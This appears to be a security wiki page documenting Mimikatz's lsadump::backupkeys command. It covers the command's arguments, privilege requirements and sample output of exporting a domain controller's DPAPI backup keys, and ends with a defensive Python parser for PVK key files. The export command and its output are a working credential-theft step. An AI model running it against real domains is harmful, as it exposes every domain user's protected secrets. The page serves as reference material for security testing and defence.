backupkeys


Last updated 3 years ago

lsadump::backupkeys dumps the DPAPI backup keys from the Domain Controller (cf. dumping DPAPI secrets). Whoever holds the domain backup key can decrypt any domain user's DPAPI master key, and with the master key that user's DPAPI-protected secrets. It takes the following command line arguments:

  • /export: export the keys as .pvk ("private key") files

  • /secret: at the time of writing, November 1st 2021, we don't know what this option refers to

  • /system: the target DC hostname

  • /guid: the szGuid value. It can be found in C:\Users\<username>\AppData\Roaming\Microsoft\Credentials, C:\Users\<username>\AppData\Local\Microsoft\Credentials and C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>. It can also be obtained with sekurlsa::dpapi.

This command requires elevated privileges (obtained by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

mimikatz # lsadump::backupkeys /export

Current prefered key:       {e3364acb-379c-4775-bef7-c3c1e1992589}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   :
        |Implementation: CRYPT_IMPL_SOFTWARE ;
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.pfx'
        Export         : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.der'

Compatibility prefered key: {b799ff33-a573-444f-bc86-b8aeb36fcb3f}
  * Legacy key
        Export         : OK - 'ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36fcb3f.key'
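As an added example (not part of this page or of Mimikatz), a small Python parser for the header of a .pvk export such as the ntds_capi_*.pvk file in the output above, as a responder might use to triage a key file found on a host. The sample bytes are constructed with zeroed key material; the PVK header layout and the CAPI PRIVATEKEYBLOB constants are Microsoft's documented values.

```python
import struct
from dataclasses import dataclass

PVK_MAGIC = 0xB0B5F11E        # PVK file header magic (little-endian on disk)
CALG_RSA_KEYX = 0x0000A400    # RSA key exchange, as shown in the output above
PRIVATEKEYBLOB = 0x07         # PUBLICKEYSTRUC.bType for a private key blob
RSA2_MAGIC = 0x32415352       # "RSA2": RSAPUBKEY magic of a private key blob


@dataclass
class PvkInfo:
    keytype: int      # 1 = AT_KEYEXCHANGE, 2 = AT_SIGNATURE
    encrypted: bool   # True when the blob is password protected
    key_len: int      # length of the CAPI blob in bytes
    alg_id: int       # ALG_ID from PUBLICKEYSTRUC
    bitlen: int       # RSA modulus size in bits


def parse_pvk(data: bytes) -> PvkInfo:
    """Parse the 24-byte PVK header and the CAPI blob header behind it."""
    if len(data) < 24:
        raise ValueError("too short for a PVK header")
    magic, _res, keytype, encrypted, salt_len, key_len = struct.unpack_from("<6I", data)
    if magic != PVK_MAGIC:
        raise ValueError(f"bad PVK magic 0x{magic:08x}")
    blob = data[24 + salt_len : 24 + salt_len + key_len]
    if len(blob) < 20:
        raise ValueError("truncated key blob")
    # PUBLICKEYSTRUC (8 bytes) is followed by RSAPUBKEY (12 bytes)
    btype, _ver, _res2, alg_id = struct.unpack_from("<BBHI", blob, 0)
    rsa_magic, bitlen, _pubexp = struct.unpack_from("<III", blob, 8)
    if btype != PRIVATEKEYBLOB or rsa_magic != RSA2_MAGIC:
        raise ValueError("not an RSA PRIVATEKEYBLOB")
    return PvkInfo(keytype, bool(encrypted), key_len, alg_id, bitlen)


def describe(data: bytes) -> str:
    info = parse_pvk(data)
    kind = {1: "AT_KEYEXCHANGE", 2: "AT_SIGNATURE"}.get(info.keytype, "unknown")
    enc = "password-protected" if info.encrypted else "plaintext"
    return f"{kind} RSA {info.bitlen}-bit private key, {enc} PVK ({info.key_len}-byte blob)"


# Constructed sample: 2048-bit RSA key-exchange PRIVATEKEYBLOB with zeroed key
# material (modulus, 5 CRT parts, private exponent) in an unencrypted PVK wrapper.
SAMPLE_BLOB = (
    struct.pack("<BBHI", PRIVATEKEYBLOB, 2, 0, CALG_RSA_KEYX)
    + struct.pack("<III", RSA2_MAGIC, 2048, 65537)
    + bytes(2048 // 8 * 2 + 2048 // 16 * 5)
)
SAMPLE_PVK = struct.pack("<6I", PVK_MAGIC, 0, 1, 0, 0, len(SAMPLE_BLOB)) + SAMPLE_BLOB

if __name__ == "__main__":
    print(describe(SAMPLE_PVK))
```

A real export is read with `open(path, "rb").read()` in place of SAMPLE_PVK; a password-protected PVK still parses here, but its RSA parameters are only meaningful after decryption.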